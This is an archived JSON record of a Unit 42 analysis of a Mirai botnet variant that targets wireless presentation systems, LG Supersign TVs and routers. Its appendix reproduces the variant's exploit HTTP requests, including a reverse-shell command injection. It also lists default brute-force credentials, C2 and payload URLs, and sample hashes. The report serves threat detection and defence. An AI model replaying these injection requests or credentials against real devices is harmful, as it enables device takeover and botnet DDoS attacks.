{
	"id": "f2328766-5b29-4c51-a7bd-d5048a34ab20",
	"created_at": "2026-04-10T03:21:25.122384Z",
	"updated_at": "2026-04-10T03:22:17.35164Z",
	"deleted_at": null,
	"sha1_hash": "f8db63e25294a89dedbaafecef450dda3b9042a2",
	"title": "New Mirai Variant Targets Enterprise Wireless Presentation \u0026 Display Systems",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 228632,
	"plain_text": "New Mirai Variant Targets Enterprise Wireless Presentation \u0026 Display\r\nSystems\r\nBy Ruchna Nigam\r\nPublished: 2019-03-18 · Archived: 2026-04-10 03:03:43 UTC\r\nExecutive Summary\r\nIn early January 2019, Unit 42 discovered a new variant of the infamous IoT/Linux botnet Mirai.\r\nMirai is best known for being used in massive, unprecedented DDoS attacks in 2016. Some of the most notable targets\r\nincluded: web hosting provider OVH, DNS provider Dyn and Brian Krebs’ website.\r\nThis new variant that Unit 42 discovered is notable for targeting different embedded devices like routers, network storage\r\ndevices, NVRs, and IP cameras and using numerous exploits against them.\r\nIn particular, Unit 42 found this new variant targeting WePresent WiPG-1000 Wireless Presentation systems, and in LG\r\nSupersign TVs. Both these devices are intended for use by businesses. This development indicates to us a potential shift to\r\nusing Mirai to target enterprises. The previous instance where we observed the botnet targeting enterprise vulnerabilities was\r\nwith the incorporation of exploits against Apache Struts and SonicWall.\r\nIn addition to this newer targeting, this new variant of Mirai includes new exploits in its multi-exploit battery, as well as new\r\ncredentials to use in brute force against devices.\r\nFinally, the malicious payload was hosted at a compromised website in Colombia: an \"Electronic security, integration and\r\nalarm monitoring\" business.\r\nThese new features afford the botnet a large attack surface. In particular, targeting enterprise links also grants it access to\r\nlarger bandwidth, ultimately resulting in greater firepower for the botnet for DDoS attacks.\r\nThese developments underscore the importance for enterprises to be aware of the IoT devices on their network, change\r\ndefault passwords, ensure that devices are fully up-to-date on patches. And in the case of devices that cannot be patched, to\r\nremove those devices from the network as a last resort.\r\nExploits\r\nThis latest sample contains a total of 27 exploits, of which are 11 new to Mirai.\r\nA full list of the exploits we have observed are listed in the Appendix. Table 1 lists exploits that haven’t been observed in the\r\nwild prior to this sample and Table 2 lists other exploits included in this variant have been observed only recently in the wild\r\nbut were incorporated in variants prior to this one.\r\nOther Features\r\nAside from the incorporation of unusual exploits, this new variant had some other differentiating features:\r\nIt makes use of the same encryption scheme as is characteristic of Mirai with a table key of 0xbeafdead.\r\nWhen decrypting strings using this key, we found certain unusual default credentials for brute force that we haven’t\r\ncome across until now:\r\nadmin:huigu309\r\nroot:huigu309\r\nCRAFTSPERSON:ALC#FGU\r\nroot:videoflow\r\nIt uses the domain epicrustserver[.]cf at port 3933 is for C2 communication.\r\nIn addition to scanning for other vulnerable devices, the new version can be commanded to send out HTTP Flood\r\nDDoS attacks.\r\nInfrastructure\r\nIronically, the shell script payload (still live, at the time of this writing) fetched by the exploits in this variant is hosted at the\r\ncompromised website for an \"Electronic security, integration and alarm monitoring\" business in Colombia.\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 1 of 9\n\nFigure 1. Shell script payload fetched by exploits\r\nAdditionally, the binaries downloaded by the shell script were named in the format “clean.[arch]” (e.g. clean.x86,\r\nclean.mips etc.), however they don’t appear to be hosted at the website any longer.\r\nPivoting on the payload source revealed some samples fetching the same payload that were hosted at\r\n185[.]248.140.102/bins/. The same IP was hosting some Gafgyt samples using the name format “eeppinen.[arch]” a few\r\ndays prior to the upgrade to this new multi-exploit variant.\r\nConclusion\r\nIoT/Linux botnets continue to expand their attack surface, either by the incorporation of multiple exploits targeting a\r\nplethora of devices, or by adding to the list of default credentials they brute force, or both. In addition, targeting enterprise\r\nvulnerabilities allows them access to links with potentially larger bandwidth than consumer device links, affording them\r\ngreater firepower for DDoS attacks.\r\nPalo Alto Networks customers are protected by:\r\nWildFire detects all related samples with malicious verdicts.\r\nAll exploits and IPs/URLs involved in these campaigns are blocked through Threat Prevention and PANDB.\r\nAutoFocus customers can track these activities using individual exploit tags:\r\nCVE-2018-17173\r\nWePresentCmdInjection\r\nDLinkRCE\r\nZyxelP660HN_RCE\r\nCVE-2016-1555\r\nNetgearDGN2200_RCE\r\nNetgearProsafeRCE\r\nNetgearReadyNAS_RCE\r\nLinksysWAP54Gv3_RCE\r\nCVE-2013-3568\r\nZTEH108L_RCE\r\nThe malware family can be tracked in AutoFocus using the tag ELFMirai\r\nAppendix\r\nVulnerability\r\nAffected\r\nDevices\r\nExploit Request Format\r\nCVE-2018-\r\n17173\r\nLG\r\nSupersign\r\nTVs\r\nGET /qsrserver/device/getThumbnail?sourceUri=''+-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2\u003e\u00261+|+;%\r\n\u003e/tmp/f\r\n;\u0026targetUri=/tmp/thumb/test.jpg\u0026mediaType=image\u0026targetWidth=400\u0026targetHeight=400\u0026scaleType=crop\u0026=153\r\nHTTP/1.1\r\nUser-Agent: Hello, world\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nWePresent\r\nWiPG-1000\r\nWePresent\r\nWiPG-1000\r\nWireless\r\nPOST /cgi-bin/rdfs.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 2 of 9\n\nCommand\r\nInjection\r\nPresentation\r\nsystems\r\nContent-Type: application/x-www-form-Content-Length: 1024 Client=;%s+wepresent_p%d;\u0026Download=submit\r\nDLink DCS-930L Remote\r\nCommand\r\nExecution\r\nDLink DCS-930L\r\nNetwork\r\nVideo\r\nCameras\r\nPOST /setSystemCommand HTTP/1.1\r\nHost: [IP]:[Port]\r\nAuthorization: Basic YWRtaW46\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nReplySuccessPage=docmd.htm\u0026ReplyErrorPage=docmd.htm\u0026SystemCommand=%s+dcs930l_p%d;\u0026ConfigSyste\r\nDLink\r\ndiagnostic.php\r\nCommand\r\nExecution\r\nDLink DIR-645, DIR-815 Routers\r\nPOST /diagnostic.php HTTP/1.\r\nHost: [IP]:[Port]\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nContent-Length: 512\r\nact=ping\u0026dst=\u0026+;%s+dlinkdir_p%d;\u0026\r\nZyxel\r\nP660HN\r\nRemote\r\nCommand\r\nExecution\r\nZyxel\r\nP660HN-T\r\nrouters\r\nPOST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nlogSetting_H=1\u0026active=1\u0026logMode=LocalAndRemote\u0026serverPort=123\u0026serverIP=1.1.1.1 ;%s+P660HN-T_p%d; \u0026#\r\nPOST /cgi-bin/ViewLog.asp HTTP/1.1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nremote_submit_Flag=1\u0026remote_syslog_Flag=1\u0026RemoteSyslogSupported=1\u0026LogFlag=0\u0026remote_host=;%s+P660\r\nT_p%d;#\u0026remoteSubmit=Save\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 3 of 9\n\nCVE-2016-\r\n1555\r\nNetgear\r\nWG102,\r\nWG103,\r\nWN604,\r\nWNDAP350,\r\nWNDAP360,\r\nWNAP320,\r\nWNAP210,\r\nWNDAP660,\r\nWNDAP620\r\ndevices\r\nGET /boardData102.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgear102_p%d;+\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nGET /boardData103.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgear103_p%d;+\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nGET /boardDataNA.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgearNA_p%d;+e\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nGET /boardDataWW.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgearWW_p%d;\r\nHTTP/1.1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nGET /boardDataJP.php?writeData=true\u0026reginfo=0\u0026macAddress=+001122334455+-c+0+;%s+netgearJP_p%d;+ech\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nCVE-2017-\r\n6077, CVE-2017-6334\r\nNetgear\r\nDGN2200\r\nN300\r\nWireless\r\nADSL2+\r\nModem\r\nRouters\r\nPOST /ping.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ\r\nReferer: http://%s/DIAG_diag.htm\r\nIPAddr1=12\u0026IPAddr2=12\u0026IPAddr3=12\u0026IPAddr4=12\u0026ping=Ping\u0026ping_IPAddr=12.12.12.12;%s+dgn2200v1_p%\r\nPOST /dnslookup.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ\r\nReferer: http://%s/DIAG_diag.htm\r\nhost_name=www.google.com;+%s+dgn2200v2_p%d\u0026lookup=Lookup\r\nNetgear\r\nProsafe\r\nRemote\r\nCommand\r\nExecution\r\nNetgear\r\nProsafe\r\nWC9500,\r\nWC7600,\r\nWC7520\r\nWireless\r\nControllers\r\nPOST /login_handler.php HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 512\r\nreqMethod=json_cli_reqMethod\u0026json_cli_jsonData=;%s+prosafe_p%d;+echo+ffffffffffffffff\r\nTable 1 New exploits used in the Mirai variant\r\nSome other exploits included in this variant have been observed only recently in the wild but were incorporated in variants\r\nprior to this one. These exploits are listed in Table 2 below:\r\nVulnerability Affected Devices\r\nFirst\r\nseen\r\n(in\r\nthe\r\nwild)\r\nExploit Format\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 4 of 9\n\nNetgear\r\nReadyNAS\r\nRemote\r\nCommand\r\nExecution/CVE-2018-15716\r\nNetgear ReadyNAS\r\nSurveillance 1.4.3-16\r\nand NUUO\r\nNVRMini devices\r\nOct,\r\n2017\r\nGET /upgrade_handle.php?cmd=writeuploaddir\u0026uploaddir=%27;%s+readynas%d;%27  HTTP/1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nLinksys\r\nWAP54Gv3\r\nRemote Debug\r\nRoot Shell\r\nLinksys WAP54G\r\nWireless Access\r\nPoints\r\nDec,\r\n2018\r\nPOST /debug.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nAuthorization: Basic R2VtdGVrOmdlbXRla3N3ZA\r\ndata1=;%s+wap54gv3%d;\u0026command=ui_debug\r\nCVE-2013-3568\r\nLinksys WRT100,\r\nWRT110 consumer\r\nrouters\r\nDec,\r\n2018\r\nPOST /ping.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nAuthorization: Basic YWRtaW46YWRtaW4\r\npingstr=\u0026+;%s+wrt100_p%d;\r\nZTE Remote\r\nCommand\r\nExecution\r\nZTE ZXV10 H108L\r\nRouters with \u003c=\r\nV1.0.01_WIND_A01\r\nOct,\r\n2018\r\nGET /getpage.gch?\r\npid=1002\u0026nextpage=manager_dev_ping_t.gch\u0026Host=;+$(;%s+h108l_p%d;)\u0026NumofRepeat=1\u0026\r\nHTTP/1.1\r\nHost: [IP]:[Port]\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nLinksys\r\napply.cgi\r\nRemote\r\nCommand\r\nExecution\r\nLinksys\r\nE1500/E2500 routers\r\n-\r\nPOST /apply.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nAuthorization: Basic YWRtaW46YWRtaW4\r\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026com\r\nPOST /apply.cgi HTTP/1.1\r\nHost: [IP]:[Port]\r\nContent-Length: 1024\r\nConnection: keep-alive\r\nAuthorization: Basic YWRtaW46YWRtaW4\r\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026com\r\nTable 2 Other exploits in the Mirai variant\r\nThe remaining exploits are ones already observed and written about in the context of previous campaigns are listed below.\r\nCVE-2017-6884\r\nGPON Exploits\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 5 of 9\n\nAVTechRCE\r\nJAWS RCE\r\nDLinkOSInjection\r\nDLinkcommandphpRCE\r\nDLinkDSL2750BOSCmdInjection\r\nVacronNVRRCE\r\nNetgain ‘ping’ Command Injection\r\nEnGeniusRCE\r\nLinksys RCE\r\nNetgear cgi-bin RCE\r\nIndicators of Compromise\r\nPayload source\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/wgetbin[.]sh\r\nC2\r\nepicrustserver[.]cf:3933\r\nURLs previously hosting Mirai variant\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.mips\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.mpsl\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.arm\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.arm5n\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.arm7\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.sh4\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.spc\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.x86\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.ppc\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.i686\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.m68k\r\nhxxp://www.autourbe[.]com.co/autourbe/language/en-GB/windata/clean.x86_64\r\nhxxp://185.248[.]140.102/bins/clean.mips\r\nhxxp://185.248[.]140.102/bins/clean.mpsl\r\nhxxp://185.248[.]140.102/bins/clean.arm\r\nhxxp://185.248[.]140.102/bins/clean.arm5n\r\nhxxp://185.248[.]140.102/bins/clean.arm7\r\nhxxp://185.248[.]140.102/bins/clean.sh4\r\nhxxp://185.248[.]140.102/bins/clean.spc\r\nhxxp://185.248[.]140.102/bins/clean.x86\r\nhxxp://185.248[.]140.102/bins/clean.ppc\r\nhxxp://185.248[.]140.102/bins/clean.i686\r\nhxxp://185.248[.]140.102/bins/clean.m68k\r\nhxxp://185.248[.]140.102/bins/clean.x86_64\r\n Samples of new Mirai variant\r\n00033b5b33b59ad88aa4f196c08eb7a6d2e6ab181ec729e8ed577d55f8b1f3ee\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 6 of 9\n\n02975fa7929a2f98963d6431f24cf4de702eb42530ac505c47d7567cf002c3d5\r\n05dc7657dc240fe7f42c3ffe95526d161151dd62f8f63188fe666ed86b0347c3\r\n075729594c4883fda420c0749be695d6d771eb61b569ac9b0124738db0f864ef\r\n07f22804757914c7a16e90bdd7ee26596f04995e5f8b90ca8d746c46039bb1c8\r\n09d75b526c79ac98b4c07ca1f28319ac1b6cafcadd0c41b71e82252211390b3d\r\n0b1a51ac04a949197c4c47d589872663be05747e18e20e7f20a24b011f4db0dd\r\n0c42ba60d95eda9cf90f7f1dbe5bcb316d871972eff9722748e9c2a343572484\r\n233094f242ce7626a5a5c1fe46ee205da279e03019b8a391bcc3fa41ce77b647\r\n234a05ac1970af58b6f76dca22aa25bece2ef1d65f4146748f6b859a19f91d31\r\n2764a0a0ab9faf04478fef4fd8ec948da431885cafa6ddf0c23ef8cda379c7d9\r\n28de1263449d88e986e37e7ce74ebc0b6cfceaeb3d5beb5dff296354f33dbf8c\r\n324eb05d47b3114c48f6505db5e4cd7c81110c42488e07c547afd7869690231f\r\n33a8b157e2fdd1acddc5085843a5ac96ee6f9df29c8f48a483bd4eebd16f73cc\r\n36d72d137abc2a43a5f6c00c9a8e41f1faf5e89643e5add1529f7343a731856f\r\n3eccc01f6677567b0aeea89b6e50c7184698732287c29f95000acc102c02dd47\r\n3f299938339bc426c5d78b55a1398da31f948f7c30d6115ab30a656cdd78de35\r\n403e702fa7e8b0a4ebde7db2e505645507b12ef0306619fb2523dea5cdf2f40d\r\n4111155bfc2f0b005d763ff4cd05e60187bdc29d3b17d0971f736da779595a9a\r\n4495af4264d11e339c4ba9776fd79c7b5554b70bbb6cc875ed7a03b7eef15f8a\r\n44ae362714ba76c65150a363b0b340a5bd422649e48df37661ba1db8e0ec0f9e\r\n46a58cfa883c71b9066b2ffe7ce475676570e9940327782927b559ea9a47df88\r\n4a7bd1ab7a9505dec2d83f44b2d99f3068823db9d9d888333ccfdd239cc72192\r\n4ebbcfeaad77207f82d072651cae53741e6af464c61735e33e385fba8edf3f61\r\n4f3e5d72f53d59f932b606f440428608b5bbd4afa8ed33148e322e0096465130\r\n5ebfd332bc5b9697d7b07e37600d495489da1b892288f051c56c8aba9574bed7\r\n613e74f2d3549fe9b76eaa404b20fe87ea89672c4bf2f0d1cf88be4d657ea323\r\n684a4c2e426a146c2217d3e62b7f7c69ea12628d182b2441c840bddacc1597f2\r\n77b059f2f5b62d059fd9e3dfaf41cbeb7543ef288410f3c85a090bf03be99b24\r\n884929e31c2cb8dc7e51949d94fe5073216be967f83f8013e0980d8959141234\r\n892efa131b0cd6ca87fa0c2e3006c8352947cfc40ac0adf51a55b711a806aa80\r\n8c9a3f8c94210813287b2789f63410d4744f3422a8012d6b1bc60a307884732c\r\n8d1700c0144d6e56d8ba4e4061694c1194a7d0bc63740a1bdebf2697e46b3978\r\n8d28628e8a31b39e178ba8c7dd781ea19db5ec3fe20f84ba20228c47a49aa543\r\n8eb7eafb26235796534ba9deeada27b4e25e7c45d9b87715ee6d4182b3ca6068\r\n8f2e458607f85f4c22ca7135df5fa2649c9979f2bb69036b3c63de52ec2f14f0\r\n938e836c5035d52f954ff91fd5008a9444a3efa3e07592ceefc9efebd260b085\r\n95ee8502a7cbac8cb21471fc40d86ddefa87ef9790f0c06d47fe47c3a2278396\r\n9d37c617dacfef668548beee55a6b1d3899ffce3e7999d43159e228dcae1db01\r\na4923ae6bf36a5c5507ed4e7f0c7b92524df04e132c1823e611ed584e5495186\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 7 of 9\n\na61717a8c64301f20ac01f6fd7462d3303a72c9ed131fdd24cd6b12eb788377b\r\na6d3081703359ee1879b2ce9c85d0c3f4ed4b319db6ecebd18054982bcf1603c\r\nae7d250606c543b241b1809158a2668408c9ecaaf3ce4d51e08700f78534ce31\r\nb1cac267d0e3456f9da90955027e55ad1b78a7bf60f11914e959814c90ea7cc6\r\nb29334ca77f72587430fde00791daa1262972d315238d624e94238dda32e9240\r\nb34b43d240c89d1e9bbd9d99c6050afc7efa62323d7788a46801576c5b1de0ab\r\nb57b14f16c41a06b1f434f60cdc9bc380a4ff1ad5b7d8edc87c097cee6f3d233\r\nb8d284ba89b562923d1eed2e67517dc8772977decc49d5f82d75237d4a8937e6\r\nba0d0e16b54aa6aaca3ab1ca2afa78148e823ae228d5f790e0279bb87dba5495\r\nbb5f7f92f4aa7cfdc0691037dc50549ccc705685bdd6f375c884bc68518b7e59\r\nbb9d7a86f107586dc8d99244a662c83c6f7667696b411292162dcb47d95d4c9b\r\nbc3eb0f7c8d4ecdacddac5d9ccc6ac44b6f6081f051d8890c5986faa37f56623\r\nbd5afefa044494010150501822f5f32be4300f482f8c8904d9fd1a30f5722fdd\r\nbdac2ed66c0f5633f5f12910bc9c03173be1fc51a76e495a36d700ba4ddc9da4\r\nc1ad4b2c0e71d2a92e4d9a4d2de01f750b8758fa3fe8a85631aaf870615b6769\r\nc30654f9bfd036f75a9c4a0f991f141243c821dbfc2b4d2ae308e68c4d232a57\r\nc86328964dfc86ca70c722e300f533bafaf234b2007867c6bf6a4e4be47cf8ca\r\nd049406662f083507dcd7278fa25bec0e93be06511ce290ed9ff309b514857a0\r\nd996a37b3bb09386b2e1e6a915b83c448065f0139d3c8057bf67e85d01ada9d1\r\ndc866393e6a549afd56d7a7a7411a4eff7f0cb37fe1964c4f87e4228d46c8eb2\r\nddaa6c58ac7ed29166af6a337500ea5ca6ca54191a4176178e1cb1a351064c4e\r\ne3c250062292daaff815345e87fb9f28e7ac683338c58de7a3a9cc743f6200e6\r\ne5432946188a1c644e23159ae588797bd967ddc1f983956878e0ad0590efc73a\r\ne60451a0b5dd0b875263c8e7c74773971b0faba783957c2a305ddf5356c9d567\r\ne6156246bb85ca4a64377d3b68b6f34805b8a6a84890a9eada984fc29bfa36e1\r\nec4eef0d92105d9b82888bce94f0a2e00988f3be1a6005c889b91afd7fd05835\r\nf01f85f9068f3c01193a0fb4b20a37573748914292a606da5cb2b5749b720366\r\nf32176c3799fd3bc3a2a24c162861d12f987db548e9ef94c3bc8c6156bcd4fe3\r\nf370a635db07bbd788991e898d8aa9be78ba0457cec3bd3e869ddc11e5693b5e\r\nf9bd8d0ae187a27d8d1ad54e8c8b551488f66141e4590ac7583cf470a2ab260d\r\nfab198f5f460b0591899bd218df79d2b50ec71ec2dd0494f1fa2bd07ba887aed\r\nfe92e66c0c5a4402972a3bf7473b98a13c067beddcba500443d194f022ca4194\r\nURLs previously hosting Gafgyt\r\nhxxp://185.248[.]140.102/eeppinen.arm\r\nhxxp://185.248[.]140.102/eeppinen.arm7\r\nhxxp://185.248[.]140.102/eeppinen.armv4l\r\nhxxp://185.248[.]140.102/eeppinen.i586\r\nhxxp://185.248[.]140.102/eeppinen.i686\r\nhxxp://185.248[.]140.102/eeppinen.mips\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 8 of 9\n\nhxxp://185.248[.]140.102/eeppinen.mipsel\r\nhxxp://185.248[.]140.102/eeppinen.m68k\r\nhxxp://185.248[.]140.102/eeppinen.x86\r\nhxxp://185.248[.]140.102/eeppinen.ppc\r\nhxxp://185.248[.]140.102/eeppinen.sh4\r\nhxxp://185.248[.]140.102/eeppinen.sparc\r\nGafgyt sample hashes\r\n070405b85448d15afe619584c3f3cc851ed43098f57ef88981edd22b663030e7\r\n19e2e20d994ba7c8af6537f640ef14459b66f333a7e5b28ef733ac81b43a628b\r\n36562e6f3917ea80fcd241bca96fe96eb4f7328b14afd2c4b528bef9ce4b21da\r\n573d539b78cdbb6d199d48ea986a5ba18c293253e48e2072e9871eb5460b2ae7\r\n5aede6d1b0376f2e8c3c292f39357137a32c8ff1a3c60c594775081707647f59\r\n6efb0d2304ce4c63205c6b502ba65a7f1b7eb87b055c0c5dcbb0120f49383588\r\n85ac0d7ce9c899ec12c8efff89f5fcb1ed8b87623bf6a1457d53f3d1dce5c71d\r\nc62c5d6255b6c1b5e8fa1861122adc180b36fbf4878f175e29367c7f6b08d7c9\r\ndb5fae3cd9ac7338e3d9fe302ffe5e261a9cafca75458523343f3562a0362ae8\r\ndd1ab1f58494611af68d7d4dbe548234f0429b0f0c3d42135dce8f4339a16a7b\r\ne0d4f82f5d1a20ca447c26b454be18aa7478a853d3526317972cb6ca9d847f29\r\ne14ff28d2188ff0f665468bd0e17db21f3f11292b85c2a370596481cdf7c835f\r\nSource: https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nhttps://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/"
	],
	"report_names": [
		"new-mirai-variant-targets-enterprise-wireless-presentation-display-systems"
	],
	"threat_actors": [],
	"ts_created_at": 1775791285,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f8db63e25294a89dedbaafecef450dda3b9042a2.pdf",
		"text": "https://archive.orkl.eu/f8db63e25294a89dedbaafecef450dda3b9042a2.txt",
		"img": "https://archive.orkl.eu/f8db63e25294a89dedbaafecef450dda3b9042a2.jpg"
	}
}